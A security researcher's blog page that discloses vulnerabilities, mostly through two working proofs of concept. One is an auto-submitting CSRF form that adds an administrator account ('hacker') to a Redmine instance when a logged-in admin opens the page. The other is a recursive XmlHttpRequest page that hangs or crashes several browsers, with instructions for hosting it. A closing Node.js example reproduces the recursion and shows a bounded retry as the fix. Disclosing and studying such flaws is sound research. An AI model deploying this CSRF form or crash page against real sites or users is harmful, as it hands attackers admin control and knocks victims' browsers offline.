I've recently released two proof-of-concepts, for the jCart application and for the Simpli Easy Newsletter (formerly AFC Simple Newsletter) script. Both of these disclosures were pretty exciting, actually.
As a responsible security researcher, I first contacted both vendors.
The guy from Simpli Easy Newsletter replied quickly. He said: "Thanks, I'll let my friend know so he can fix it."
Funny, isn't it? Three weeks have passed, but his friend did nothing and my further emails were ignored. So, my disclosure was responsible in effect.
An absolutely different situation happened with jCart. I sent an email to its vendor but didn't receive any reply, and in a couple of days I released the vulnerabilities. Some time later I received an annoyed email from Doug Whitney (the jCart guy), in which he explained that I was wrong not to contact him first. Of course, I forwarded him my previous email and, what's funny, everything was correct, but it had landed in his spam folder. So, was it responsible disclosure or not? Anyhow, it was pretty funny.
Showing posts with label poc.
10/30/2010
11/17/2009
Redmine CSRF Add Admin User PoC
Redmine, a flexible project management web application used by many companies, including the one where I work, was until today vulnerable to CSRF everywhere from task updates to administration. So the easiest and most critical PoC I could write was one that creates a user with administrative rights.
I contacted Redmine's security team and they rapidly released a new version and a separate patch (they are a cool team, actually). Those who use it need to update ASAP, because this vulnerability is a critical one.
<!-- www.site.org stands for the target Redmine host; the victim must be logged in as an admin -->
<form method=POST action="http://www.site.org/users/new">
  <input type="text" value="hacker" size="25" name="user[login]" id="user_login"/>
  <input type="text" value="hacker" size="30" name="user[firstname]" id="user_firstname"/>
  <input type="text" value="hacker" size="30" name="user[lastname]" id="user_lastname"/>
  <input type="text" value="hacker@hacker.com" size="30" name="user[mail]" id="user_mail"/>
  <input type="password" size="25" name="password" id="password" value="hacker" />
  <input type="password" size="25" name="password_confirmation" id="password_confirmation" value="hacker" />
  <input type="checkbox" value="1" name="user[admin]" id="user_admin"/>
  <!-- the unchecked checkbox above is never submitted; this hidden field is what sets user[admin]=1 -->
  <input type="hidden" value="1" name="user[admin]"/>
  <input type="submit" value="Create" id="commit" name="commit" />
</form>
<!-- auto-submit as soon as the page loads in the admin's browser, using the admin's session cookie -->
<script>document.getElementById("commit").click();</script>
EDIT: It seems that Redmine was not fixed in the new version :) Maybe there were some problems with my local version, but the token was generated once and for all users. I've reached out to them, so it should finally get fixed.
9/11/2009
IE 7.x/8.x, Opera 10.x, Safari 4.x DoS PoC
While playing around with cross-domain requests, I noticed that a page containing a cycled XmlHttpRequest leads to abnormal behaviour in different browsers.
MS Internet Explorer 7.x/8.x (I haven't got 6.x, but I'm sure it's affected) begins to devour system resources (CPU and memory), shows the error message "Stack Overflow at line: 43" and stops processing the page in a few seconds.
Opera 10.x crashes in a few seconds, and its crash may possibly lead to execution of shellcode (I debugged it with WinDbg and !exploitable).
Apple Safari 4.x simply hangs, devouring system resources.
However, Mozilla Firefox 3.5 and Google Chrome can handle this exploit.
Vendors have been contacted, but there has been no reaction.
I've posted this very dirty PoC at sla.ckers, and finally it's here.
So, to test this PoC, create a page containing the exploit, place it on your local webserver (any LAMP) or website, and open it.
The PoC contains the usual cross-browser getXmlHttp() factory (ActiveX fallback for older IE) and a cycled XmlHttpRequest: one asynchronous request whose completion handler starts a synchronous request that re-issues itself on every 404, with no base case, so the call stack grows until the browser gives up.
<script>
// Cross-browser XMLHttpRequest factory: ActiveX for older IE, native object elsewhere.
function getXmlHttp() {
  var xmlhttp;
  try {
    xmlhttp = new ActiveXObject("Msxml2.XMLHTTP");
  } catch (e) {
    try {
      xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
    } catch (E) {
      xmlhttp = false;
    }
  }
  if (!xmlhttp && typeof XMLHttpRequest != 'undefined') {
    xmlhttp = new XMLHttpRequest();
  }
  return xmlhttp;
}
</script>
<script>
// Synchronous request that re-issues itself on every 404. There is no base case, so each
// retry adds a stack frame (the "Stack Overflow at line: 43" seen in IE).
function getXmlHttpSploit() {
  var xmlhttp = getXmlHttp();
  xmlhttp.open('GET', 'nonexistentpage', false);
  xmlhttp.send(null);
  if (xmlhttp.status == 404) {
    getXmlHttpSploit();
  }
}
</script>
<script>
// Kick-off: one asynchronous request; its completion handler starts the synchronous cycle.
var xmlhttp = getXmlHttp();
xmlhttp.open('GET', 'nonexistentpage', true);
xmlhttp.onreadystatechange = function() {
  if (xmlhttp.readyState == 4) {
    if (xmlhttp.status == 404) {
      getXmlHttpSploit();
    }
  }
};
xmlhttp.send(null);
</script>
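The failure mode above is plain unbounded recursion in a retry loop, which can be reproduced and contrasted with a safe retry outside of any browser. The following is an added example (my own, not the original PoC): Node.js has no XMLHttpRequest, so a synchronous `requestSync(url)` stub stands in for `xmlhttp.send()` against a constructed server that always answers 404; `boundedRetry`, its option names and the constructed stub servers are assumptions for the example.

```javascript
// Added example, not the original PoC. Reproduces the PoC's unbounded retry against a stub
// server and shows the bounded, iterative form of the same loop. Run with: node retry_loop.js

// 1. The PoC's pattern: re-issue the request from inside the handling of the previous one.
//    Every retry adds a stack frame and nothing ever breaks the cycle on a 404.
function pocRetry(requestSync, url) {
  if (requestSync(url) === 404) {
    pocRetry(requestSync, url); // unbounded recursion, no base case
  }
}

function runPocUntilItBreaks(requestSync, url) {
  try {
    pocRetry(requestSync, url);
    return 'finished';
  } catch (e) {
    // V8 raises RangeError ("Maximum call stack size exceeded"): the same class of failure
    // as IE's "Stack Overflow at line: N" message quoted in the post.
    return e instanceof RangeError ? 'stack overflow' : 'other error: ' + e.message;
  }
}

// 2. Hardened: iterate instead of recursing, cap the attempts, retry only statuses that can
//    plausibly change (network failure or 5xx, never a 404), and hand the delay to an injected
//    scheduler so the caller can back off instead of hammering the server.
function boundedRetry(requestSync, url, options = {}) {
  const {
    maxAttempts = 5,
    retryOn = (status) => status === 0 || status >= 500,
    onWait = () => {}, // receives the backoff delay in ms; a real caller would sleep here
  } = options;
  let attempts = 0;
  let status;
  for (;;) {
    attempts += 1;
    status = requestSync(url);
    if (!retryOn(status) || attempts >= maxAttempts) break;
    onWait(Math.min(1000 * 2 ** (attempts - 1), 30000)); // exponential backoff, capped at 30 s
  }
  return { status, attempts, gaveUp: retryOn(status) };
}

// Constructed stub servers (no network involved).
const always404 = () => 404;
function flakyServer(failuresBeforeSuccess) {
  let calls = 0;
  return () => (calls++ < failuresBeforeSuccess ? 503 : 200);
}

module.exports = { pocRetry, runPocUntilItBreaks, boundedRetry, always404, flakyServer };
```

`runPocUntilItBreaks(always404, '/nonexistentpage')` comes back with the stack overflow in well under a second; the bounded version returns after a single 404 because a 404 is not a retryable status, and gives up after `maxAttempts` on a server that keeps failing.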